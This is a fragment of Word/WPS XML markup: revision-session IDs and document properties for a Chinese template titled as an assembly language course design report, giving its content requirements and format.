    <w:rsid w:val="00AC0F62"/>
    <w:rsid w:val="00AC628A"/>
    <w:rsid w:val="00B04203"/>
    <w:rsid w:val="00B1282C"/>
    <w:rsid w:val="00B1388A"/>
    <w:rsid w:val="00B26530"/>
    <w:rsid w:val="00B4241E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53014"/>
    <w:rsid w:val="00C63726"/>
    <w:rsid w:val="00C90A89"/>
    <w:rsid w:val="00C96959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C66D8"/>
    <w:rsid w:val="00DE7333"/>
    <w:rsid w:val="00E059A1"/>
    <w:rsid w:val="00E10F14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D0685"/>
    <w:rsid w:val="00FE5115"/>
    <w:rsid w:val="14BE4D00"/>
    <w:rsid w:val="19E56EA0"/>
    <w:rsid w:val="1CB26532"/>
    <w:rsid w:val="2BC9212F"/>
    <w:rsid w:val="308A47AE"/>
    <w:rsid w:val="351E483D"/>
    <w:rsid w:val="57873DE0"/>
    <w:rsid w:val="5E843CAD"/>
    <w:rsid w:val="6517057D"/>
    <w:rsid w:val="68C04CBF"/>
    <w:rsid w:val="73214465"/>
    <w:rsid w:val="7DCB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6</Pages>
  <Words>1811</Words>
  <Characters>2611</Characters>
  <Lines>10</Lines>
  <Paragraphs>2</Paragraphs>
  <TotalTime>20</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2939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2022-04-26T07:03:00Z</dcterms:created>
  <dc:creator>User</dc:creator>
  <cp:lastModifiedBy>WPS_1695647206</cp:lastModifiedBy>
  <cp:lastPrinted>2007-09-24T09:20:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-10-31T09:38:57Z</dcterms:modified>
  <dc:title>汇编语言课程设计报告－内容要求与格式模板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FE7D6805887342D1A858F1CBF5FA7B8A_12</vt:lpwstr>
  </property>
</Properties>
</file>